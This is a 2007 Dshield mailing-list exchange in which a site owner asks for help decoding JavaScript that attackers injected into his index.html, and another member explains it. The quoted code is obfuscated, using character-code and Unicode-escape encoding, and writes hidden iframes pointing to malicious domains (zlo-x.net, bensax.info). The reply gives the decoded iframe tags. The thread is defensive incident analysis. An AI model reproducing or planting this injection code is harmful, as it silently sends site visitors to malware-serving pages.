[Dshield] Need help decoding hackers javascript code

Security security at hudakville.com
Tue Sep 4 18:12:33 GMT 2007


Steve,

  The document.write part is UTF-8 Hex Encoding which, in this case,
is really just the hex representation of the ASCII letters.  It
decodes to:

<iframe src="h t t p://zlo-x.net/XDS/iframe.php" width=0 height=0
border=0></iframe>

(with the http intact).

The Decode javascript function decodes to:

<iframe width=1 height=1 border=0 frameborder=0 src='h t t
p://bensax.info/index2.html'></iframe>

(with the http intact once again).

Both of these sites lead to other JS encoded pages which lead to
further nastiness.


Tyler

Steve West wrote:
> Hi,
> 
> Just found some hackers who have replaced the index.html with the 
> following code below. I'm wondering if anyone knows of a tool I can use 
> to safely decode the following:
> 
> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
> <!--
> function Decode(){var temp="",i,c=0,out="";var 
> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!105!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
> //-->
> </SCRIPT><SCRIPT LANGUAGE="JavaScript">
> <!--
> Decode();
> //-->
> </SCRIPT>
> <meta name="revisit-after" content="1 days" /><script 
> type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
> 
> --
> thx,
> 
> SW
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
> instructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 
> 
> 


More information about the list mailing list